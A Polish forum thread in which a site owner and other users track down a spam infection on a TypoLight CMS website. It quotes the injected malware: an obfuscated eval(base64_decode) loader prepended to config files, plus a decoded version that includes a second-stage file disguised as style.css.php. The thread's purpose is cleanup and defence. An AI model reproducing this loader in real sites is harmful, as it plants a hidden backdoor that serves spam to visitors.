8 odpowiedzi w tym temacie

[scorpimen]

witam

ostatnio przeglądałem sobie jakie linki znajduje google i bing na moja stronę i doznałem szoku
na hasło scorpimen pokazuje mnóstwo spamu

i teraz takie cos
http://not4u.scorpim... ... ke you cry
http://not4u.scorpimen.eu/

strona stoi na typolight
co prawda długo stała na wersji 2.6 ale zrobiłem jej aktualizacje ostatnio do najnowszej i dalej mam te śmieci

Jak to wywalić

[Kamil]

Albo ktoś dostał się do twojego FTPa, albo powinieneś jak najszybciej wgrać łatkę http://www.typolight... ... -tool.html

Nie wiem jak to usunąć, najpierw sprawdź czy są jakieś podejrzane pliki na serwerze. Wklej tu zawartość pliku .htaccess

[qrczak]

Był też taki wirus, który wysysał dane do kont ftp, łączył się z nimi i jakiś syf tam wgrywał. Było kilka zgłoszeń tego typu na oficjalnym forum i za każdym razem to był wirus. Nie wiem jak to jest w twoim przypadku ale może warto sprawdzić co masz na ftp i/lub czy coś nie jest doklejone do pliku index.php

[Kamil]

Nie wiem jak to jest w twoim przypadku ale może warto sprawdzić co masz na ftp i/lub czy coś nie jest doklejone do pliku index.php

To by się zgadzało - zmienna $_GET['bdoc'], a index.php nie widać, bo włączony jest mod_rewrite.

[scorpimen]

wrzuciłem świeży index.php i htaccess, ściągnąłem pliki z serwera i przeskanowałem nodem i zero zmiany

chyba czeka mnie czyszczenie całego serwerka i postawienie paru stron od nowa
---
chyba znalazłem winowajce
ciekawe jest to ze siedział w plikach system/config/
na początku plików doklejał tylko skąd ten syf ??

<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL3JjNS9kb21haW5zL3Njb3JwaW1lbi5ldS9wdWJsaWNfaHRtbC9ub3Q0dS9wbHVnaW5zL3RpbnlNQ0UvdGhlbWVzL3NpbXBsZS9za2lucy9vMms3L2ltZy9zdHlsZS5jc3MucGhwJztpZihmaWxlX2V4aXN0cygkR0xPQkFMU1snbWZzbiddKSl7aW5jbHVkZV9vbmNlKCRHTE9CQUxTWydtZnNuJ10pO2lmKGZ1bmN0aW9uX2V4aXN0cygnZ21sJykmJmZ1bmN0aW9uX2V4aXN0cygnZGdvYmgnKSl7b2Jfc3RhcnQoJ2Rnb2JoJyk7fX19')); ?>
<?php if (!defined('TL_ROOT')) die('You can not access this file directly!');

---
jednak to nie to choć i tak dziwna sprawa skąd to się tam wzieło

[spin80]

Nie wiem czy czasem ten wirus nie zajmuje się również plikami default.php i main.php

[Kamil]

jednak to nie to choć i tak dziwna sprawa skąd to się tam wzieło

Sprawdzałeś plik /plugins/tinyMCE/themes/simple/skins/o2k7/img/style.css.php?

<span class="syntaxhtml"><span class="syntaxdefault"><?phpif </span><span class="syntaxkeyword">(</span><span class="syntaxdefault">function_exists</span><span class="syntaxkeyword">(</span><span class="syntaxstring">'ob_start'</span><span class="syntaxkeyword">)</span><span class="syntaxdefault"> </span><span class="syntaxkeyword">&&</span><span class="syntaxdefault"> </span><span class="syntaxkeyword">!isset(</span><span class="syntaxdefault">$GLOBALS</span><span class="syntaxkeyword">[</span><span class="syntaxstring">'mfsn'</span><span class="syntaxkeyword">])){</span><span class="syntaxdefault">    $GLOBALS</span><span class="syntaxkeyword">[</span><span class="syntaxstring">'mfsn'</span><span class="syntaxkeyword">]=</span><span class="syntaxstring">'/home/rc5/domains/scorpimen.eu/public_html/not4u/plugins/tinyMCE/themes/simple/skins/o2k7/img/style.css.php'</span><span class="syntaxkeyword">;</span><span class="syntaxdefault">    if </span><span class="syntaxkeyword">(</span><span class="syntaxdefault">file_exists</span><span class="syntaxkeyword">(</span><span class="syntaxdefault">$GLOBALS</span><span class="syntaxkeyword">[</span><span class="syntaxstring">'mfsn'</span><span class="syntaxkeyword">]))</span><span class="syntaxdefault">    </span><span class="syntaxkeyword">{</span><span class="syntaxdefault">        include_once</span><span class="syntaxkeyword">(</span><span class="syntaxdefault">$GLOBALS</span><span class="syntaxkeyword">[</span><span class="syntaxstring">'mfsn'</span><span class="syntaxkeyword">]);</span><span class="syntaxdefault">        if </span><span class="syntaxkeyword">(</span><span class="syntaxdefault">function_exists</span><span class="syntaxkeyword">(</span><span class="syntaxstring">'gml'</span><span class="syntaxkeyword">)</span><span class="syntaxdefault"> </span><span class="syntaxkeyword">&&</span><span class="syntaxdefault"> function_exists</span><span class="syntaxkeyword">(</span><span class="syntaxstring">'dgobh'</span><span class="syntaxkeyword">))</span><span class="syntaxdefault">        </span><span class="syntaxkeyword">{</span><span class="syntaxdefault">            ob_start</span><span class="syntaxkeyword">(</span><span class="syntaxstring">'dgobh'</span><span class="syntaxkeyword">);</span><span class="syntaxdefault">        </span><span class="syntaxkeyword">}</span><span class="syntaxdefault">    </span><span class="syntaxkeyword">}}</span><span class="syntaxdefault">?></span></span>

Idę o dychę, że tam siedzi druga część złośliwego kodu.

[scorpimen]

w tym css.php tez było.

Co znajdę jakiś kod i skasuje to to g.. dokleja mi go znowu. jak się tego pozbyć kompleksowo i co to jest jeśli można wiedzieć. Bo czuje, że wiecie coś o tym świństwie, więcej niż ja.

[Kamil]

Albo to świństwo siedzi u ciebie na kompie, albo na serwerze. Gdzie masz hosting?

Po pierwsze, z innego komputera zmień hasło do serwera FTP. Następnie usuń znowu te linijki. Jeśli sytuacja się powtórzy, to będzie wiadomo, że te świństwo zagościło na serwerze. W przeciwnym wypadku zagościło na twoim komputerze.